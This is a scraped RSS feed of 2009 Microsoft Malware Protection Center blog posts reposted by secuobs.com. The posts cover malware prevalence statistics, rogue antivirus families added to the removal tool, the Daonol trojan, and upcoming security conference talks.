As usual we encourage you to run Microsoft Security Essentials, which contains the full AV signature set from the MMPC, or another reputable AV product, to protect your internet activities. Scott Wu -- MMPC</description><link>http://www.secuobs.com/revue/news/162763.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/162763.shtml</guid></item>
<item><title>What's Another 32-bits to Malware?</title><description>Secuobs.com : 2009-11-16 23:03:30 - Microsoft Malware Protection Center - The migration of PC computing from 32-bit to 64-bit is in full swing at last, and if you've been confused as to what it all means, you're not alone. PCs built for years now have been capable of running both 32-bit and 64-bit operating systems, but for that you need a 64-bit version of Windows (and corresponding drivers for devices), and getting everything working on 64-bit used to be for brave and technical people only. There are many advantages to using a 64-bit operating system: using twice as many bits can make computers faster, and the maximum amount of memory that can be used goes way above the 4 gigabyte limit (that's 2^32 bytes). And 64-bit Windows includes Patchguard, which makes tampering with the Windows kernel (the part of the OS that makes the underlying hardware usable by software) much, much more difficult. Most PCs shipping with Windows 7 come with the 64-bit versions of Windows, and finally there's nothing to be confused about: these PCs just work. As reported in the Security Intelligence Report, 64-bit Windows has some of the lowest reported malware infection rates in the first half of 2009. There are still many threats that can affect 64-bit Windows, unfortunately. One other feature of 64-bit Windows is WOW64, which is an acronym for Windows On Windows 64. WOW64 emulates a 32-bit Windows environment to allow software to run on the 64-bit operating system, which is great for compatibility with applications that haven't ported to 64-bit yet, but also allows malicious code to grab a foothold. Even though these threats may run, since they're running in the 32-bit emulated Windows environment they can do less to your computer, and don't see 64-bit processes at all. For the same reason, 64-bit Windows needs 64-bit antimalware software like Microsoft Security Essentials to protect the whole computer. Computer viruses are very confused by 64-bit. Taking a look at 64-bit executable code detected by Microsoft antimalware technologies in the past month, the vast majority is innocent 64-bit files infected by 32-bit viruses. While a 32-bit virus can only see other 32-bit processes, it unfortunately can see the file system, and can tamper with files it finds there. The 32-bit code in a 64-bit binary will immediately crash when executed. So even 64-bit Windows needs protection from malware. There are also two remote control software packages that have been ported to 64-bit, which are potentially unwanted if you don't know they are on your computer, and a couple of hacking tools that have been written for 64-bit.
Threat | Reports | Distinct Files
Virus:Win32/Virut | 193954 | 11307
RemoteAccess:Win32/DameWareMiniRemoteControl | 24672 | 16
Virus:Win32/Slugin | 12817 | 2474
HackTool:Win32/Wpakill | 9700 | 19
Virus:Win32/Gael | 5033 | 2206
RemoteAccess:Win32/RemotelyAnywhere | 388 | 111
Virus:Win32/Bacalid | 82 | 36
HackTool:Win64/Welevate | 25 | 3
Table 1: Detected 64-bit binaries
Note that though the Microsoft Antimalware Engine may use the Win32 prefix for threat names, the technologies used can still locate malicious 64-bit code with signatures for 32-bit threats. Overall, 64-bit malware is still exceedingly rare in the wild, and the additional protections built into 64-bit Windows will make it harder for malware to make the 64-bit jump that's easy for PC users with Windows 7. For a complete discussion of the PC threat landscape, see the Security Intelligence Report. --Joe Faulhaber</description><link>http://www.secuobs.com/revue/news/161319.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/161319.shtml</guid></item>
<item><title>Plays Well With Others</title><description>Secuobs.com : 2009-11-13 03:32:51 - Microsoft Malware Protection Center - Just over a week ago the Microsoft Malware Protection Center released the seventh edition of our Security Intelligence Report covering the first half of 2009. Like all of our previous reports we have distilled information and insight from the wide array of telemetry we have available to us. New to this edition, however, is the inclusion of third party data and insight. Specifically, we have worked with Shadowserver to include data collected for the Conficker Working Group (CWG) as well as insights from various Computer Emergency Response Teams (CERTs) worldwide. Microsoft is thankful for the many strong partnerships we have around the world and is committed to the industry collaboration typified by CWG as well as the programs in the Microsoft Security Response Alliance (MSRA). MSRA is an umbrella program which is made up of similarly themed security programs for different constituencies. Some MSRA programs include the Microsoft Virus Initiative (MVI) and the Virus Information Alliance, which are in place to provide technical guidance, malware sample exchange and support to other anti-virus ISVs, as well as the Security Cooperation Program (SCP) and SCPcert, which relate to information exchange and collaboration with governments and with CERT organizations (governmental or non-governmental) in regions across the globe. We would specifically like to call your attention to content provided by several of our CERT partners. As you have likely seen from either my previous blog entry on this Security Intelligence Report, or from the report itself, or even previous reports we have released, we do a comparative analysis of infection rates between countries. We've asked several CERTs from some of the countries with the lowest rates of infection to discuss factors to which they attribute the lower rate and their thoughts on associated best practices. Some very interesting things can be found in there (starting on page 44), such as the correlation between higher broadband penetration and adoption of security updates, the correlation between prevalence of pirated software and infection rate and, most importantly, the importance of industry collaboration in reducing the impact of malware in a region. Download the report here: http://www.microsoft.com/downloads/details.aspx?FamilyID=037f3771-330e-4457-a52c-5b085dc0a4cd&amp;displaylang=en. Jeff Williams (we want to hear from you: SIRFB at microsoft.com)</description><link>http://www.secuobs.com/revue/news/160352.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/160352.shtml</guid></item>
<item><title>Rogues FakeVimes and PrivacyCenter added to MSRT</title><description>Secuobs.com : 2009-11-10 23:58:17 - Microsoft Malware Protection Center - This month we've added two more rogue families to the Malicious Software Removal Tool (MSRT): Win32/FakeVimes and Win32/PrivacyCenter. Both have been around since early 2009, but have become more prevalent in the last few months. Win32/FakeVimes has gone through a lot of different names, usually with two or three active at any given time. Currently it's calling itself Windows System Defender and Windows Enterprise Suite. Its interface may look familiar even if you've never had the misfortune of being affected by the malware - it has copied elements of the Windows Defender and Windows Security Center UIs, and its "activate" button includes an imitation of the Genuine Microsoft Software logo. In addition to the usual reports of non-existent malware, some variants of FakeVimes display imitation User Account Control (UAC) dialogs, with a recommended option of "protect". Clicking "protect" just leads to another dialog asking you to activate*. Sometimes FakeVimes also claims to detect spambot behaviour. In this case, it uses the Microsoft Office logo in an attempt to make its warnings appear more credible. Win32/PrivacyCenter hasn't gone through anywhere near as many names as FakeVimes. It started off calling itself Privacy Center, changed to Privacy Components and now goes by Safety Center. PrivacyCenter looks quite primitive compared to most modern rogues. Sometimes it even reports its own files as malware. Some variants of PrivacyCenter make themselves the default shell application, so when you reboot you might find that the trojan runs instead of Explorer. Both Win32/FakeVimes and Win32/PrivacyCenter are distributed through fake online scanners, similar to those used by most other rogues. -- Hamish O'Dea. *As with most rogues, "activate" means pay.</description><link>http://www.secuobs.com/revue/news/159560.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/159560.shtml</guid></item>
<item><title>Greetings from Tokyo</title><description>Secuobs.com : 2009-11-06 05:24:44 - Microsoft Malware Protection Center - This year at the PacSec conference, I will present a Microsoft view of the threat landscape during the first six months of 2009. It will be based on telemetry data published in the latest Security Intelligence Report (SIR), published on Nov 2nd, 2009. You can find the agenda of the conference at http://pacsec.jp/agenda.html. From data gathered by a number of Microsoft security products (e.g. Forefront Client Security, Windows Defender, Microsoft Windows Malicious Software Removal Tool, etc.), we see attacks by malware continuing to target specific regions or groups of users. While Japan has a relatively lower infection rate than many countries, we notice that other Asian countries have a high relative infection rate which, in a number of cases, is due to high prevalence of Win32/Taterf (a worm used to steal passwords). As attackers continue to exploit the Internet infrastructure and application service environment on a large scale, it is important to establish collaboration among ISPs, security solution providers, law enforcement and other service providers to combat malicious threats. In Japan, participants in Japan's Cyber Clean Center (e.g. ISPs, security ISVs including Microsoft, government) have been working collaboratively against malicious and potentially unwanted malware. We would appreciate more such efforts and collaboration models, particularly in countries and regions where threats are most prevalent. I hope to see people at the conference and invite them to learn more about the different threat mixes and trends in a number of countries, by downloading and reading the latest SIR. Regards, Tony Lee.
Greetings from the old Capital, Kyoto
----------------------------------------
Hello from the historical imperial city of Kyoto. Yesterday, or today depending on where you are, I had the honor of giving the opening presentation at the twelfth annual AVAR conference. The AVAR conference has grown in significance over the past decade to become one of the top security conferences in the world. The International AVAR conference concentrates on the computer security situation in the Asia Pacific region. So I will be highlighting data from volume 7 of the Security Intelligence Report that has been gathered from the region. All in all, most of the Asia and Pacific regions are significantly below the worldwide average. But two of the most highly infected regions are among the largest and increasing. This tells us we still have work ahead of us. Community based defenses are what's needed in our next step in the war against malware. And organizations like AVAR are necessary to bring the community together. Jimmy Kuo</description><link>http://www.secuobs.com/revue/news/158096.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/158096.shtml</guid></item>
<item><title>The Low-Down on Daonol</title><description>Secuobs.com : 2009-11-04 04:20:44 - Microsoft Malware Protection Center - A relatively new trojan has been making the rounds and causing some problems, particularly on Windows XP systems. Trojan:Win32/Daonol is malware which hooks various system calls in order to steal credential information and redirect some web traffic. It also protects itself by keeping some security-related software from running. Several recent versions of this malware are buggy and prevent computers from successfully shutting down or (more importantly) starting up. If you have (or someone you know has) a Windows XP system which won't boot completely (i.e., shows the "Windows XP" splash-screen with the progress bar, but then the screen turns black and the system never starts up completely), it's likely a Daonol infection. Visit our write-up for Trojan:Win32/Daonol to find instructions on cleaning Daonol off your system if you think you are infected. Another obvious symptom of infection is that regedit.exe and cmd.exe will not launch properly. To see if this is the case, navigate to Start > Run and enter regedit.exe. If nothing happens after a few seconds, most likely you are infected with Daonol. If you launch cmd.exe in the same way, you will see a command-prompt window but no text will appear in the window itself. Daonol allows the regedit and cmd processes to launch, but it forces them into a suspended state and doesn't allow them to do anything. Microsoft Security Essentials can detect and remove all known variants of Daonol, as well as keep you from being infected by it in the first place. If you aren't using an anti-malware solution, do yourself a favor and head over there for a free copy of Microsoft Security Essentials. Stay safe out there on the interwebs, Aaron Putnam</description><link>http://www.secuobs.com/revue/news/156963.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/156963.shtml</guid></item>
<item><title>Security Intelligence Report v7 is Now Available</title><description>Secuobs.com : 2009-11-03 01:07:16 - Microsoft Malware Protection Center - Twice a year we put together a report detailing threat-related trends that we see in the computer security environment. Today we have released our seventh report, which you can find at www.microsoft.com/sir. I'm very excited about this report. We, the MMPC, and our partners in the Microsoft Security Engineering Center, Bing, Windows Live and many others have collaborated to make this our most comprehensive report to date. The report includes insights drawn from data collected consensually from the more than 450 million people running the Malicious Software Removal Tool each month, the hundreds of millions of mailboxes at Hotmail we protect, data gathered by Bing in scanning billions of web pages each year, as well as the telemetry received from more than 100 million of our customers running Windows Live OneCare, Forefront Client Security and Windows Defender, as well as spam, phishing and malware data relating to the billions of emails scanned by Forefront Online Protection for Exchange. The data we have available gives us an unparalleled view of threat activity on the internet, both worldwide and regionally, in more than 212 countries and regions across all seven continents. In this edition we provide an in-depth review of malicious and potentially unwanted software, software exploits, security breaches and software vulnerabilities (both Microsoft and third party) around the world, as well as providing detailed views of a number of countries. We review malware distribution sites by country, discuss phishing and spam trends and geographic distribution, details on vulnerability disclosure practices, differences in threat distribution between consumers and enterprise, and we also provide guidance for IT professionals and business decision makers based on this information. For the first time ever, we include Best Practices contributed by representatives from four of the countries (Austria, Finland, Germany, and Japan) that have managed to maintain the lowest malware infection counts in their countries. It is our hope that you find this information valuable and that it helps you to make shrewd risk-management decisions. We also welcome your feedback for future editions. Please email us at SIRFB at microsoft.com with your thoughts. --Jeff Williams, Principal Group Program Manager, MMPC</description><link>http://www.secuobs.com/revue/news/156349.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/156349.shtml</guid></item>
<item><title>MSRT October Release - Case Study</title><description>Secuobs.com : 2009-10-27 22:28:19 - Microsoft Malware Protection Center - As of October 21st, the MSRT has removed the newly added threat, Win32/FakeScanti, from 56,700 infected machines. For this month, it was the 12th most prevalent threat family worldwide and 7th in the US. Overall the MSRT has cleaned 2,516,235 machines this month from all kinds of malware infections. We all know the threat landscape is not homogenous across geographic regions. Let's take a look at the US, China, and Brazil as a case study.
United States (Family | Threats | Machines Cleaned):
Alureon | 147,387 | 117,351
Taterf | 121,988 | 116,217
FakeXPA | 108,026 | 103,578
Renos | 69,147 | 55,461
FakeRean | 78,067 | 53,376
Yektel | 52,259 | 51,061
FakeScanti | 70,120 | 50,260
Frethog | 51,038 | 49,526
Daurso | 32,205 | 32,150
Koobface | 43,640 | 27,793
FakeSpypro | 26,530 | 26,242
China (Family | Threats | Machines Cleaned):
Lolyda | 77,781 | 72,863
Frethog | 21,927 | 20,042
Ceekat | 9,440 | 8,767
Conficker | 8,899 | 8,427
Hupigon | 5,127 | 4,879
Parite | 7,518 | 4,592
RJump | 3,875 | 2,552
Brontok | 980 | 969
Taterf | 1,177 | 963
Corripio | 980 | 855
Sdbot | 776 | 770
Brazil (Family | Threats | Machines Cleaned):
Taterf | 72,464 | 70,069
Bancos | 67,577 | 59,414
Frethog | 33,455 | 32,009
Banker | 27,421 | 26,420
Conficker | 19,664 | 18,398
Banload | 18,617 | 18,121
Cutwail | 8,452 | 5,269
Alureon | 3,656 | 3,053
Renos | 3,192 | 2,228
IRCbot | 1,929 | 1,874
Brontok | 1,768 | 1,739
Note: rogues in italics; Password Stealers (PWS) bolded.
Some key takeaways: In the US (as well as other English speaking countries) rogues are predominant. Six of the top ten threat families in the US are rogues or rogue-related trojan downloaders. This poses a challenge for end users to identify the legit AV products when there are so many rogue products popping up on the users' machines. Six of the top ten threat families in China are password stealers, most of which are hunting for online gamers' credentials. Six of the top ten threat families in Brazil are also password stealers, though a lot of them (Bancos, Banker and Banload) tend to target online banking credentials in Brazil. We close, as we always do, by urging you to take action and protect yourself. Scott Wu</description><link>http://www.secuobs.com/revue/news/154565.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/154565.shtml</guid></item>
<item><title>VISTA_32_BIT_BLACK HAT EDITION_2009.iso</title><description>Secuobs.com : 2009-10-21 03:54:56 - Microsoft Malware Protection Center - As we've mentioned before, your average user is the most at risk of getting infected these days. So, with the release of Microsoft Security Essentials recently en masse, we're really able to see some of the fruits of our labour over the last few years. We're very pleased to see such a positive response to MSE, with many new home users giving it a try, which as you can imagine, makes us all happy little Vegemites. As you might expect, we see pretty different infection types from home users versus the enterprise. Generally, infection vectors for the home user are web-based, either via malicious websites or by being enticed to download something that is, how you say, "not so much with the good". The term "home user" generalises; the computer-based experience of these users covers a broad spectrum. The savvier of these computer users, one would expect, would have a better chance of avoiding infection. However this is not entirely true: as we've mentioned in previous posts, savvy computer users actually open themselves up to more risks while they're exploring the deeper darker depths of what the Internet has to offer. To wit, after MSE's release, we've seen a spike in a particular variant of Win32/Bifrose: Backdoor:Win32/Bifrose.EO. Why, you ask? Well, it seems that the malware authors (or perhaps an unsuspecting pirate) are distributing a "cracked" version of Windows that comes pre-infected for your convenience, labelled, fittingly, "Vista Black Edition". Just to clarify, this means computer users are downloading an ISO of pirated Microsoft software (and saving to disk on a Genuine Windows system) and a free Microsoft anti-virus product is alerting them to a potential infection in their freshly stolen software. I'm not really sure if "irony" really emphasises the situation enough. But hey, at least the Windows is free*, right? What's even more interesting (read: funny) is that despite this, it seems this isn't enough to stop people from trying to utilize their ill-gotten gains. Underground forums are teeming with helpful hints on how to disinfect your newly acquired (though somewhat "not as advertised") software. No doubt some of the instructions include using other pirated software products. So you see kids, illegal software is seldom free of all cost. Chances are you're paying for it in ways you didn't consider. Matt McCormack, MMPC Melbourne (the team down in Australia at least). *Disclaimer: "Free" may be changed at any time to actually mean "cost you", with one or more of the following words appended to the end: passwords, bandwidth, login information, bank account details, email accounts, credit rating, dignity, ...</description><link>http://www.secuobs.com/revue/news/152359.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/152359.shtml</guid></item>
<item><title>Microsoft Security Essentials - Week One</title><description>Secuobs.com : 2009-10-16 08:34:51 - Microsoft Malware Protection Center - Now that Microsoft Security Essentials is generally available to consumers in 19 countries, we've had a chance to go over the data, and there are some very interesting results. Just in the first week we saw well over 1.5 million downloads of Microsoft Security Essentials, but the price (free to Windows users) is hard to beat. Computers reporting detections up to October 6: almost four million detections on 535,752 distinct machines. The detections are eight times the machine count because many computers are infected with multiple threats. Microsoft Security Essentials is available in 8 languages and 19 markets at RTM, which covers a lot of the PC-using world. The geographic distribution of detections so far still closely follows the Microsoft Security Essentials Beta countries, and is ramping up in other countries that use the 8 languages. Looking at counts of computers reporting detections by threat category, we see that the order is different in each of the top three countries: Trojans are the top detected category in the US, China has lots of potentially unwanted software threats, and worms (particularly Conficker) are very active in Brazil. There are also many exploits being encountered in China, which may mean these PCs do not have the latest security updates. The top threat families for these countries have remarkably similar curves, but very different family mixes. China's top families include several exploits (ShellCode, IFrameRef), the US has the trojan Wimad and the rogue trojan FakeXPA at the top, while Brazil has the worms Conficker and Taterf. For family details, see the MMPC threat encyclopedia at http://microsoft.com/security/portal. Looking at the operating system breakdown, we're seeing lots of Windows 7 using Microsoft Security Essentials, but a pretty even balance between OSes. The Windows 7 numbers are spectacular for an operating system that hasn't yet been released for global availability. Even better, about 1/3rd of Windows 7 Microsoft Security Essentials machines are 64-bit, which is even more resistant to malware than 32-bit due to PatchGuard. By looking at detections divided by active Microsoft Security Essentials machines over the whole population, we see far more detections per XP machine, with the fewest from Win7. This follows our usual observed trend of seeing less malware on newer OSes and service packs. In one short week, Microsoft Security Essentials is making a big difference to those people using it on their computers. If you don't have updated antimalware on your computer, we strongly recommend giving Microsoft Security Essentials a try. --Joe Faulhaber</description><link>http://www.secuobs.com/revue/news/151101.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/151101.shtml</guid></item>
<item><title>Scanti-ly Clad - Another Rogue Stripped by MSRT</title><description>Secuobs.com : 2009-10-14 01:56:22 - Microsoft Malware Protection Center - Anyone who's seen a system infected by a rogue security program doesn't need to be told how annoying they can be, as they attempt to scare, threaten, cajole, hector, harangue, pester, aggravate, intimidate, badger, harass and generally nag the user into paying to register the fake software. And even among rogues, there are few that are quite as annoying as Win32/FakeScanti, which is this month's addition to the Malicious Software Removal Tool (MSRT). I realize I'm being more than a little repetitive here. But this still pales in comparison to how repetitive your average rogue can get. We first saw a variant of Win32/FakeScanti back in early March of this year, when it went by the name of ASC Antivirus. There was then very little activity on the FakeScanti front until late July, when we noticed a file, which we detect as TrojanDownloader:Win32/FakeScanti, downloading a new version of the scanner going by the name of Windows Antivirus Pro. This version was proactively detected by the signatures added in March. Since then there has been a steady stream of new files, but only one name change, to Windows Police Pro. Apart from the name change, the user interface, and even the list of alleged "malware" detected by this rogue, has remained identical. FakeScanti has your usual grab bag of popups, system tray balloons, and dialog boxes (there are many examples of these in our Win32/FakeScanti description), all reporting malicious activity and recommending that the reported threats be removed. Of course, if you want this to happen, then naturally you have to pay. These popups tend to pile up on the screen at a rapid rate, and dismissing any one of them results in the confirmation dialog below, which also needs to be closed. Notice how the placement of the Purchase and Continue buttons is swapped compared to the dialog above. Win32/FakeScanti also uses a number of other tricks common to many other rogues, such as displaying a fake version of the Windows Security Center, or blocking access to certain web sites. It uses a number of other methods in an attempt to convince users that the system is infected. These include:
- Periodically rebooting the system.
- Preventing other executables from running. It does this by associating the .exe extension with desot.exe, one of the files installed by Win32/FakeScanti. As a result, when an attempt is made to run one of these files, the filename is passed to desot.exe, which decides whether it is allowed to run, and displays a message box such as the one above if not.
- Using Active Desktop to place text on the desktop background.
- Displaying error messages which resemble the "Dr. Watson" Windows system error dialog. The "Fix it" button launches the fake scanner. The other buttons do not do anything.
As we've mentioned before, if you're concerned about the veracity or legitimacy of a particular antivirus scanner, it's a good idea to check whether the product in question has received any industry-recognized certification. Virus Bulletin's VB100 is a good place to start, but there are other industry-recognized testing and certification bodies that are good for this kind of verification. If you're looking for security software for your computer, you could also visit http://www.microsoft.com/windows/antivirus-partners for a list of security software providers. If you believe you are infected, we encourage you to use the Windows Live OneCare safety scanner to check your PC for malware and to help remove it from your system. In addition, we encourage you to submit any suspicious files to the MMPC team for analysis. If you don't already have active, up-to-date anti-malware protection, remember that our new security product, Microsoft Security Essentials, runs quietly in the background and never asks you for payment. --David Wood</description><link>http://www.secuobs.com/revue/news/150130.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/150130.shtml</guid></item>
<item><title>Where in the world is the MMPC?</title><description>Secuobs.com : 2009-10-12 21:54:13 - Microsoft Malware Protection Center - Based on the interest we saw in the various presentations our team did at Virus Bulletin in Geneva a couple of weeks back, we thought you might be interested in where else we will be presenting in the coming weeks. On October 13, Vinny Gullotto will be in a panel discussion in Washington DC at the "Emerging Threats, Vulnerabilities, &amp; Challenges in the Cybersecurity Ecosystem" event put on by TechAmerica. You can find information on how to register for this event at http://www.techamerica.org/cybersecurity-ecosystem. Also on October 13, Jeff Williams will present the keynote for Malware 2009 in Montreal, Canada. Information on Malware 2009 is available at http://www.malware2009.org. On November 4, Jimmy Kuo will present the keynote for the Association of anti-Virus Asia Researchers International Conference (AVAR) in Kyoto, Japan. Information on AVAR 2009 can be found here: http://www.aavar.org/avar2009. November 4-5 is also when you will find us at the PacSec conference in Tokyo, Japan, where Tony Lee will be presenting on the threat landscape and where Jeff Williams may deliver a lightning talk if he has the chance. You can find information about PacSec at http://pacsec.jp. That's all for now, since we need time to pack. We hope to see many of you at one or more of these events. --Microsoft Malware Protection Center</description><link>http://www.secuobs.com/revue/news/149699.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/149699.shtml</guid></item>
<item><title>Notes from the VB Conference</title><description>Secuobs.com : 2009-10-01 21:00:10 - Microsoft Malware Protection Center - Back in our labs in Dublin, Melbourne, and Redmond from the 2009 Virus Bulletin conference. This year there were almost 400 attendees and 49 presentations covered by 60 speakers (7 of them from Microsoft). The MMPC had presenters from all three labs at the conference, and we started and ended the technical stream. The topics this year included malware, spam, and this year's hot topic, cloud technology. There were also interesting talks on social networks, URL shortening, browser plug-ins, Banker trojans, and testing the performance of in-the-cloud antivirus scanners. It was exciting for our first-time speakers to meet others from the industry. It was also an opportunity to catch up with old friends and colleagues. The welcome drinks and gala dinner allowed us to mingle with them in a relaxed atmosphere. Microsoft also won second place in the IT Security Table Foosball Championship: Francis from the Dublin MMPC lab and Terry from the Antispam team played against foosball teams from other companies. We also had the chance to see some sights in Geneva and the surrounding countryside and vineyards (which are directly adjacent to France). Luckily, the weather was perfect the whole time we were there, and so the beautiful fountain in Lake Geneva, the Jet d'Eau, was turned on every day. We also saw the flower clock and the old town with its gorgeous architecture. Next year, the Virus Bulletin conference will be in Vancouver. We're certainly looking forward to it. --Katrin</description><link>http://www.secuobs.com/revue/news/146523.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/146523.shtml</guid></item>
<item><title>Introducing Microsoft Security Essentials</title><description>Secuobs.com : 2009-09-30 00:00:49 - Microsoft Malware Protection Center - The Microsoft Malware Protection Center (MMPC) would like to introduce you to Microsoft's new security program, Microsoft Security Essentials. The MMPC is very excited about this release, which should help us to protect more customers around the world at no cost. Here's a note from the Microsoft Security Essentials team: Microsoft Security Essentials (formerly codenamed "Morro") is the newest security product from Microsoft that helps protect consumers against viruses, spyware and other malicious software. The program, using the same technology as the Forefront product family, is designed to protect and take the guesswork out of wondering whether you are protected or not. If you're green, you're good. Red or yellow means there is something that needs to be done to keep your PC secure. A single click and the PC is back to the green, protected state. Microsoft Security Essentials is also designed to address cost and other barriers that have prevented many of our customers from running up-to-date security protection on their PCs. Because there are no subscription fees, there is no registration required to collect billing or other personal information. It also runs quietly in the background, scheduling scans when the PC is most likely idle and interrupting the user only when there is an action required to keep their PC secure. It employs practices like active memory swapping and CPU throttling to limit the impact on your PC's performance, even on older or less powerful PCs. This isn't a security suite product that provides rich PC tuning capabilities or backs up your data. But if what you're looking for is "install and forget" malware protection and solid quality, Microsoft Security Essentials may be just what you've been waiting for. Plus, as a user of Microsoft Security Essentials you'll get support from the MMPC. We think you're gonna like what you get with Microsoft Security Essentials. See for yourself and download it now. Microsoft Security Essentials is available now in 8 languages and 19 markets around the world for genuine Windows PCs. Download at http://www.microsoft.com/security_essentials.</description><link>http://www.secuobs.com/revue/news/145688.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/145688.shtml</guid></item>
<item><title>From Dublin to Geneva</title><description>Secuobs.com : 2009-09-22 05:48:59 - Microsoft Malware Protection Center - Hello! Greetings from Dublin! As mentioned by Jakub in a previous post, we are presenting at the Virus Bulletin International Conference 2009 in Geneva next week. It's an understatement to say that we're excited about attending the conference, and not just about presenting our papers, but about getting the chance to meet the other delegates. From the technical stream we have Elda and Francis: We're presenting our paper entitled "Blast from the Past: Application of the MS08-067 Exploit in Real World Malware". Together with our colleague Scott Wu from the team in Redmond, we'll talk about the MS08-067 vulnerability and how it was exploited by different malware, including Conficker. The presentation explains the Server service vulnerability addressed in the MS08-067 security bulletin and shows how different malware families utilized this exploit. We also present some interesting data from the field on the malware families involved. We're the first presenters for the technical stream, so we'll see you on Wednesday morning! From the corporate stream we have Ina and Marian: We are presenting our paper, "The Cloud or the Mist". Those of you who are Stephen King fans might be familiar with his novella "The Mist", in which an evil mist invades a town and wreaks havoc. In the same way, cloud technology is a buzzword right now, and some people are hyping it as the next evolution of the Internet. Yet there are a lot of valid concerns, especially about privacy and security. Our paper talks about the potential security risks of the cloud: what dangers exist when we store personal and sometimes highly profitable information in the cloud? What social engineering techniques exist that have only emerged with cloud technology? And what malware families exploit the cloud to perform their malicious routines? We are presenting on Friday right before lunch, but we promise our slides will be just as filling. We'd all love to meet those of you who will be attending and especially those of you who are interested in our research. See you there! Kita kits (Filipino), Ne vedem acolo (Romanian), Slán go fóill (Gaelic). - Elda, Francis, Ina and Marian</description><link>http://www.secuobs.com/revue/news/143033.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/143033.shtml</guid></item>
<item><title>The modern rogue - a timely subject</title><description>Secuobs.com : 2009-09-18 10:44:54 - Microsoft Malware Protection Center - As Jakub mentioned, I'll soon be presenting at the Virus Bulletin conference in Geneva. I've spent a lot of time looking at rogue security software in the last year, so I'm looking forward to sharing some of my findings. The subject of rogues (or "scareware") is a timely one. You may have heard reports in the past few days of a couple of malware attacks which involved rogues. One of these was an attack where visitors to the New York Times web site were seeing pop-ups telling them that their computer was infected, then being redirected to a fake online malware scanner. There have also been several reports of "hackers" exploiting the news of Patrick Swayze's death in order to direct people to (you guessed it) a fake online scanner. Not only were both of these attacks distributing rogues, they were both pushing the same rogue. We call it Win32/FakeXPA. Win32/FakeXPA has been using these distribution methods for a while now. The New York Times attack was accomplished through a malicious advertisement; these have been used to distribute rogues via legitimate web sites at least since early 2007. The second attack was not an attempt to exploit the death of Patrick Swayze specifically, but rather part of an ongoing campaign that Win32/FakeXPA's distributors have been running to poison results from search engines to lure people to their malicious sites. Most popular search terms are exploited in this way, by rogues like Win32/FakeXPA and other types of malware too. These are the same techniques that have made Win32/FakeXPA the most prevalent rogue for some time. Despite the press, we are not seeing increased activity from Win32/FakeXPA through our telemetry or from our customers. I'll be talking about both of these distribution techniques (and a lot more about rogues) in Geneva. I hope to see you there! - Hamish O'Dea</description><link>http://www.secuobs.com/revue/news/142139.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/142139.shtml</guid></item>
<item><title>I can't go back to yesterday - see you in Geneva</title><description>Secuobs.com : 2009-09-16 11:27:46 - Microsoft Malware Protection Center - At last year's VB conference, my talk "Playing with shadows - exposing the black market for online game password theft" discussed malware being sold on the black market for password stealing purposes. During the Q &amp; A time, someone asked a question regarding the technical details of Dogrobot, a family of malware that can penetrate the protection offered by a "hard disk recovery card" (used to restore a machine to a known, clean state). Unfortunately, I don't think I gave a satisfactory answer, due to my limited research on it at that time. I've been feeling guilty since then, and the experience encouraged me to spend more time studying it. After crawling around in file system drivers and Dogrobot drivers for a few months, I finally managed to get a comprehensive understanding of the technical details of this malware. Unfortunately, "I can't go back to yesterday" to answer the question again; fortunately, the VB committee gave me a second chance - they accepted my paper entitled "'I can't go back to yesterday, because I was a different person then'", which will be presented at VB2009, on 23rd September in Geneva. In the presentation, delegates will hear about:
- Malware designed to specifically target the recovery hardware used in Internet Cafés in China - how it works, and why.
- Malware that has caused 8 billion RMB (1.2 billion USD) in losses but doesn't infect files.
- Further details of the black market for malware.
Are you interested in this? See you in Geneva. Chun Feng</description><link>http://www.secuobs.com/revue/news/141379.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/141379.shtml</guid></item>
<item><title>September in Geneva</title><description>Secuobs.com : 2009-09-15 07:20:32 - Microsoft Malware Protection Center - Another year has passed, and the time of the most important annual anti-malware event is upon us. The Virus Bulletin International Conference 2009 takes place on 23-25 September at The Crowne Plaza Hotel in Geneva, Switzerland. As usual, the program is packed to the rafters with malware-related material, with presentations spread across two parallel streams, and three busy days that, no doubt, will be filled with research papers, discussions and heated but friendly arguments. A strong contingent from Microsoft is attending, including authors and presenters discussing the results of their latest research. The delegates can see the following Microsoft presentations: On Wednesday, September 23, a paper titled "Blast from the past: application of the MS08-067 exploit in real world malware" by Elda Dimakiling, Francis Allan Tan Seng and Scott Wu. On the same day, and also in the Technical stream, the paper "I can't go back to yesterday, because I was a different person then" by Chun Feng. On Thursday, in the Corporate stream, the paper "How to reclaim your sender reputation" by Terry Zink from the FOSE team. During Friday's proceedings, in the Corporate stream, the paper "The cloud or the mist" by Marian Radu and Hilda Larina Ragragio. On the same day, as the last presentation of the conference, and just before the closing panel discussion, the paper "The modern rogue - malware with a face" by Hamish O'Dea. Traditionally, every VB Conference attracts big interest and large crowds, making each event a perfect venue for various industry meetings, and it's no different this year - the AVPD and the WildList meetings are already scheduled for the same time, at the same location. Jakub Kaminski</description><link>http://www.secuobs.com/revue/news/140868.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/140868.shtml</guid></item>
